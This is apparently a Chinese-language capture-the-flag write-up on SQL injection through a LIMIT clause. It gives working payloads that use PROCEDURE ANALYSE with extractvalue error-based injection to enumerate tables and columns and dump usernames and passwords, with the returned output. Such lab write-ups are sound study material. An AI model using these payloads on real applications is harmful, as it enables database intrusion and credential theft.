题目:
小明经过学习,终于对SQL注入有了理解,她知道原来sql注入的发生根本原因还是数据和语句不能正确分离的原因,导致数据作为sql语句执行;但是是不是只要能够控制sql语句的一部分就能够来利用获取数据呢?小明经过思考知道,where条件可控的情况下,实在是太容易了,但是如果是在limit条件呢?
writeup:
写在前面:地址由于太长题目地址就用url代替。
点击题目进去, 地址为url?start=0&num=1.出现一句话。
- 随便几个数字测试start和num,发现num值不对结果产生干扰,尝试在num值后加单引号发现报错,如:‘0,1\’‘。可以看到单引号被过滤了,并且,start和num就是limit的两个参数.
- 尝试使用union注入:
会出现如下错误:url?start=0 union select 1%23&num=1
也就是说在limit语句前面还有order by语句,GG。Incorrect usage of UNION and ORDER BY Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51
- union既然不行了那怎么办(注意注释符#可用)?上网查了一下mysql的select语法
SELECT [ALL | DISTINCT | DISTINCTROW ] [HIGH_PRIORITY] [STRAIGHT_JOIN] [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT] [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS] select_expr [, select_expr ...] [FROM table_references [WHERE where_condition] [GROUP BY {col_name | expr | position} [ASC | DESC], ... [WITH ROLLUP]] [HAVING where_condition] [ORDER BY {col_name | expr | position} [ASC | DESC], ...] [LIMIT {[offset,] row_count | row_count OFFSET offset}] [PROCEDURE procedure_name(argument_list)] [INTO OUTFILE 'file_name' export_options | INTO DUMPFILE 'file_name' | INTO var_name [, var_name]] [FOR UPDATE | LOCK IN SHARE MODE]]
所以可以用procedure语句了。构造如下语句
?start=0 procedure analyse(extractvalue(rand(),concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database()))),1)%23&num=1
返回的结果为:XPATH syntax error: 'article,user' Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51
可以看到现在的数据库中有两个表:article和user。 - 现在爆破user表中的列(由于分号被过滤了,只能用16进制的ascii编码表示表名):
?start=0 procedure analyse(extractvalue(rand(),concat(1,(select group_concat(column_name) from information_schema.columns where table_name=0x75736572))),1)%23&num=1
返回结果为:XPATH syntax error: 'id,username,password,lastloginIP' Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51
想想username中应该会有发现:?start=0 procedure analyse(extractvalue(rand(),concat(1,(select group_concat(username) from user))),1)%23&num=1
可以看到可疑值flag,再看看password列应该就会得到flag:XPATH syntax error: 'user,admin,flag' Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51
?start=0 procedure analyse(extractvalue(rand(),concat(1,(select group_concat(password) from user))),1)%23&num=1
XPATH syntax error: 'user,admin,myflagishere' Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51
果然flag为myflagishere。
写在后面:由于刚接触sql注入不久拿到这一题想了很久,在网上找了好多资料,最后才知道其实这是limit的注入参考了这篇文章http://netsecurity.51cto.com/art/201501/464519.htm.